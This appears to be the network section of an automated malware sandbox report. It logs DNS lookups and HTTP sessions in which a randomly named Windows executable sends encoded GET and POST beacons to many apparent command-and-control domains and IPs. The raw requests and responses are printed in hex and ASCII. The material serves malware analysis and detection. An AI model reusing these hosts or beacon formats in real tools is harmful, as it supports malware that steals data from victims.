                                                                                                                                                  Nov 14, 2024 15:41:04.437089920 CET53587231.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:22.395776987 CET5926153192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:41:22.460025072 CET53592611.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:36.033531904 CET6333353192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:41:36.046595097 CET53633331.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:41:49.518559933 CET5127753192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:41:49.685539961 CET53512771.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:03.102376938 CET5330453192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:42:04.093319893 CET5330453192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:42:04.405814886 CET53533041.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:04.405877113 CET53533041.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:18.269285917 CET5028553192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:42:18.358532906 CET53502851.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:31.940896034 CET5853153192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:42:32.006277084 CET53585311.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:40.082256079 CET6549053192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:42:40.249519110 CET53654901.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:42:54.115345955 CET6011153192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:42:54.150876045 CET53601111.1.1.1192.168.2.5
                                                                                                                                                  Nov 14, 2024 15:43:07.552159071 CET5794653192.168.2.51.1.1.1
                                                                                                                                                  Nov 14, 2024 15:43:07.652375937 CET53579461.1.1.1192.168.2.5

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                  Nov 14, 2024 15:39:39.799484015 CET192.168.2.51.1.1.10x75f3Standard query (0)www.corpseflowerwatch.orgA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:39:55.625530005 CET192.168.2.51.1.1.10x500fStandard query (0)www.4nk.educationA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:40:09.297338009 CET192.168.2.51.1.1.10xd3c9Standard query (0)www.migraine-massages.proA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:40:22.719587088 CET192.168.2.51.1.1.10x3d05Standard query (0)www.vnxoso88.artA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:40:36.533797026 CET192.168.2.51.1.1.10xb0Standard query (0)www.pluribiz.lifeA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:40:50.081841946 CET192.168.2.51.1.1.10x76c4Standard query (0)www.kdtzhb.topA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:04.407363892 CET192.168.2.51.1.1.10x3ebdStandard query (0)www.evoo.websiteA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:22.395776987 CET192.168.2.51.1.1.10xc0e9Standard query (0)www.astorg-group.infoA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:36.033531904 CET192.168.2.51.1.1.10x5316Standard query (0)www.fiqsth.vipA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:49.518559933 CET192.168.2.51.1.1.10xffa7Standard query (0)www.bio-thymus.comA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:03.102376938 CET192.168.2.51.1.1.10xbb8eStandard query (0)www.wukong.collegeA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:04.093319893 CET192.168.2.51.1.1.10xbb8eStandard query (0)www.wukong.collegeA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:18.269285917 CET192.168.2.51.1.1.10xfec7Standard query (0)www.vehiculargustav.clickA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:31.940896034 CET192.168.2.51.1.1.10xfef1Standard query (0)www.bulls777.proA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:40.082256079 CET192.168.2.51.1.1.10x981bStandard query (0)www.yushaliu.onlineA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:54.115345955 CET192.168.2.51.1.1.10x66a9Standard query (0)www.marketprediction.appA (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:43:07.552159071 CET192.168.2.51.1.1.10xe45cStandard query (0)www.066bet.xyzA (IP address)IN (0x0001)false

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                  Nov 14, 2024 15:39:39.925853968 CET1.1.1.1192.168.2.50x75f3No error (0)www.corpseflowerwatch.orgcorpseflowerwatch.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:39:39.925853968 CET1.1.1.1192.168.2.50x75f3No error (0)corpseflowerwatch.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:39:39.925853968 CET1.1.1.1192.168.2.50x75f3No error (0)corpseflowerwatch.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:39:55.694902897 CET1.1.1.1192.168.2.50x500fNo error (0)www.4nk.educationwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:39:55.694902897 CET1.1.1.1192.168.2.50x500fNo error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:40:09.371701002 CET1.1.1.1192.168.2.50xd3c9No error (0)www.migraine-massages.pro199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:40:23.005467892 CET1.1.1.1192.168.2.50x3d05No error (0)www.vnxoso88.art77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:40:23.005467892 CET1.1.1.1192.168.2.50x3d05No error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:40:36.694467068 CET1.1.1.1192.168.2.50xb0No error (0)www.pluribiz.life209.74.64.58A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:40:50.553510904 CET1.1.1.1192.168.2.50x76c4No error (0)www.kdtzhb.top47.242.89.146A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:04.437089920 CET1.1.1.1192.168.2.50x3ebdNo error (0)www.evoo.website128.65.195.180A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:22.460025072 CET1.1.1.1192.168.2.50xc0e9No error (0)www.astorg-group.infowebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:22.460025072 CET1.1.1.1192.168.2.50xc0e9No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:36.046595097 CET1.1.1.1192.168.2.50x5316No error (0)www.fiqsth.vipfiqsth.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:36.046595097 CET1.1.1.1192.168.2.50x5316No error (0)fiqsth.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:36.046595097 CET1.1.1.1192.168.2.50x5316No error (0)fiqsth.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:49.685539961 CET1.1.1.1192.168.2.50xffa7No error (0)www.bio-thymus.combio-thymus.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:49.685539961 CET1.1.1.1192.168.2.50xffa7No error (0)bio-thymus.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:41:49.685539961 CET1.1.1.1192.168.2.50xffa7No error (0)bio-thymus.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:04.405814886 CET1.1.1.1192.168.2.50xbb8eNo error (0)www.wukong.college47.52.221.8A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:04.405877113 CET1.1.1.1192.168.2.50xbb8eNo error (0)www.wukong.college47.52.221.8A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:18.358532906 CET1.1.1.1192.168.2.50xfec7No error (0)www.vehiculargustav.clickppp84k45ss7ehy8ypic5x.limelightcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:18.358532906 CET1.1.1.1192.168.2.50xfec7No error (0)ppp84k45ss7ehy8ypic5x.limelightcdn.com23.106.59.18A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:32.006277084 CET1.1.1.1192.168.2.50xfef1No error (0)www.bulls777.probulls777.proCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:40.249519110 CET1.1.1.1192.168.2.50x981bNo error (0)www.yushaliu.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:54.150876045 CET1.1.1.1192.168.2.50x66a9No error (0)www.marketprediction.appmarketprediction.appCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:54.150876045 CET1.1.1.1192.168.2.50x66a9No error (0)marketprediction.app3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:42:54.150876045 CET1.1.1.1192.168.2.50x66a9No error (0)marketprediction.app15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                  Nov 14, 2024 15:43:07.652375937 CET1.1.1.1192.168.2.50xe45cName error (3)www.066bet.xyznonenoneA (IP address)IN (0x0001)false

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • www.corpseflowerwatch.org
                                                                                                                                                  • www.4nk.education
                                                                                                                                                  • www.migraine-massages.pro
                                                                                                                                                  • www.vnxoso88.art
                                                                                                                                                  • www.pluribiz.life
                                                                                                                                                  • www.kdtzhb.top
                                                                                                                                                  • www.evoo.website
                                                                                                                                                  • www.astorg-group.info
                                                                                                                                                  • www.fiqsth.vip
                                                                                                                                                  • www.bio-thymus.com
                                                                                                                                                  • www.wukong.college
                                                                                                                                                  • www.vehiculargustav.click
                                                                                                                                                  • www.yushaliu.online
                                                                                                                                                  • www.marketprediction.app

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.5498033.33.130.190804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:39:39.945863962 CET390OUTGET /yjfe/?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.corpseflowerwatch.org
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Nov 14, 2024 15:39:40.575146914 CET409INHTTP/1.1 200 OK
                                                                                                                                                  Server: openresty
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:39:40 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 269
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 36 33 38 62 34 55 3d 73 73 4c 6c 2f 37 30 47 41 68 55 63 4b 64 44 67 64 56 66 58 6f 70 37 66 78 52 4d 67 70 59 69 5a 33 76 73 4a 63 63 4f 55 48 79 43 71 7a 63 70 66 72 49 72 72 64 30 34 61 32 4f 41 4e 36 57 66 48 68 77 79 42 30 52 51 2b 44 6c 6a 6e 48 75 36 52 67 75 70 52 61 74 47 67 7a 47 67 65 50 67 37 56 6c 41 34 39 47 31 30 4b 53 53 4c 34 79 41 62 54 46 6d 59 53 73 31 52 6c 57 48 45 74 38 6b 74 63 76 41 3d 3d 26 58 6c 6c 3d 35 30 68 4c 63 30 48 68 79 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy"}</script></head></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.549881217.70.184.50804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:39:55.714243889 CET639OUTPOST /gnvu/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 208
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  Origin: http://www.4nk.education
                                                                                                                                                  Referer: http://www.4nk.education/gnvu/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 32 71 6b 4e 34 62 4f 70 38 73 4c 42 4e 72 4a 77 6a 70 61 4d 6a 71 35 6d 62 39 4e 4b 71 71 4d 54 55 50 67 6f 4b 51 3d
                                                                                                                                                  Data Ascii: W638b4U=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuT2qkN4bOp8sLBNrJwjpaMjq5mb9NKqqMTUPgoKQ=
                                                                                                                                                  Nov 14, 2024 15:39:56.510382891 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:39:56 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.549890217.70.184.50804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:39:58.248111010 CET659OUTPOST /gnvu/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 228
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  Origin: http://www.4nk.education
                                                                                                                                                  Referer: http://www.4nk.education/gnvu/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 42 33 4b 38 4e 69 6b 2b 4b 71 34 62 43 4c 48 73 4a 68 6f 39 44 46 6d 43 30 48 47 72 54 5a 71 42 73 4c 41 53 33 64 4f 77 32 59 72 2b 32 37 59 77 6f 47 2f 71 53 4a 53 39 48 55 74 6f 64 6c 53 56 6a 58 51 69 4d 6b 42 43 69 61 35 32 76 2b 46 74 2f 76 39 56 2b 77 6c 63 47 64 2f 68 67 51 32 4d 65 70 36 75 6e 45 79 36 44 37 4c 39 6f 66 4b 2b 2b 43 6d 66 55 67 2b 63 55 71 75 49 65 57 63 32 74 77 65 45 37 61 6a 71 42 68 79 66 44 47 42 32 49 31 36 62 61 4c 6c 4a 33 66 51 32 64 47 64 62 2f 74 71 2f 78 32 2b 71 55 68 48 30 51 59 52 65 36 33 51
                                                                                                                                                  Data Ascii: W638b4U=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDGB2I16baLlJ3fQ2dGdb/tq/x2+qUhH0QYRe63Q
                                                                                                                                                  Nov 14, 2024 15:39:59.079838037 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:39:58 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.549905217.70.184.50804068C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  Nov 14, 2024 15:40:00.802840948 CET1676OUTPOST /gnvu/ HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Content-Length: 1244
                                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  Origin: http://www.4nk.education
                                                                                                                                                  Referer: http://www.4nk.education/gnvu/
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Raw: 57 36 33 38 62 34 55 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 64 4f 72 53 45 71 38 4a 52 62 32 61 4c 68 47 36 30 62 31 42 2b 2f 4f 6d 62 61 54 78 63 41 6a 4b 37 2f 61 6b 76 62 71 34 59 43 4c 48 79 5a 68 70 39 44 46 6e 43 79 75 50 72 54 6c 36 42 71 50 41 44 69 42 4f 6e 55 77 72 6e 47 37 59 74 34 47 2b 6b 79 4a 4c 39 48 6b 68 6f 64 31 53 56 6a 58 51 69 4b 41 42 56 6a 61 35 6c 2f 2b 47 71 2f 76 35 45 75 78 77 63 47 30 4b 68 67 63 4d 4d 75 4a 36 72 33 55 79 33 52 44 4c 38 49 66 55 2f 2b 43 2b 66 54 70 35 63 55 32 45 49 65 4c 4a 32 71 63 65 47 4d 72 49 77 78 63 6b 42 56 57 6a 37 71 5a 2f 61 74 6e 63 42 31 76 51 2f 75 75 4d 66 72 6c 63 70 6b 47 71 35 33 55 2b 71 6d 38 31 55 4d 53 76 34 4c 58 4b 45 4b 56 39 64 37 71 68 50 54 4c 36 64 59 44 47 4f 6d 6e 70 41 33 47 46 42 4a 31 6a 78 6e 56 61 63 73 4b 74 6d 52 5a 34 70 44 54 35 63 39 6d 6c 58 53 46 57 64 61 6e 4f 38 48 38 76 79 4c 4c 48 41 4d 46 6a 6d 75 5a 6a 6f 35 44 56 7a 53 39 59 71 34 37 4d 63 30 68 6c 62 6c 31 4e 6e 73 58 36 43 41 4b 47 33 31 68 4b 36 38 [TRUNCATED]
                                                                                                                                                  Data Ascii: W638b4U=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcAjK7/akvbq4YCLHyZhp9DFnCyuPrTl6BqPADiBOnUwrnG7Yt4G+kyJL9Hkhod1SVjXQiKABVja5l/+Gq/v5EuxwcG0KhgcMMuJ6r3Uy3RDL8IfU/+C+fTp5cU2EIeLJ2qceGMrIwxckBVWj7qZ/atncB1vQ/uuMfrlcpkGq53U+qm81UMSv4LXKEKV9d7qhPTL6dYDGOmnpA3GFBJ1jxnVacsKtmRZ4pDT5c9mlXSFWdanO8H8vyLLHAMFjmuZjo5DVzS9Yq47Mc0hlbl1NnsX6CAKG31hK689mtcUKPAhaNpMQq979kYDODo/EGzn9WzCG6moFyqpqZ+rShHu7FiHmDao6ZRDPixUU6V7iPlXFRMDRlKy5ytlONRaw0zWPP/HnzqpWHvAMnvnepp/Xabkv03vZ+DWCZNknwkGV/jIZ6UtSjEhwkeaO5+g2QlGYpq4MzdndhzU7kun06WI6C2raMf5HF1p6UZSuG0YJgnJVnIu6ey1x8hdS8HcguFFAGpcf3L2NmwlDcR5K5vKLYHeJuFYcosSZY12j1qv1n085guofT4V1go5N/COB2a2E1VVzE8Z5a4Wz76OCobY63va9dIWF8nensywECy2u2TTeyND5KBa/tYVcBF67A1jA3nHEqAP6rRnTfYMxcFh6JBTCxdvgTyPNPX7fKUQVXCIK4KNbPjSLg75klUAyWdH8OGhAc8c6FTH9kv/iYYQZBFcGneqVSaw9knztc/xaAWELBn08UObm43ja5ASJI5QaWEB7FQ1n5UgVn6szFpfJ7fZWNC5IQVaaHO4q0+XziK1OUeioc1WPBd2xsD9Wd5O3Rr49X/ONkaY3dGbPK28S9E+B/y2nCPIHxEYYgFU0VoriBrv5JC+GBmODak7aeNdZCzM3Eh1KTyepwZrCW63Q/36MItEm3TeNgcjkgLU3ygEyl2GcqW3nWm82vnXkSnspRMjT [TRUNCATED]
                                                                                                                                                  Nov 14, 2024 15:40:01.654900074 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:40:01 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
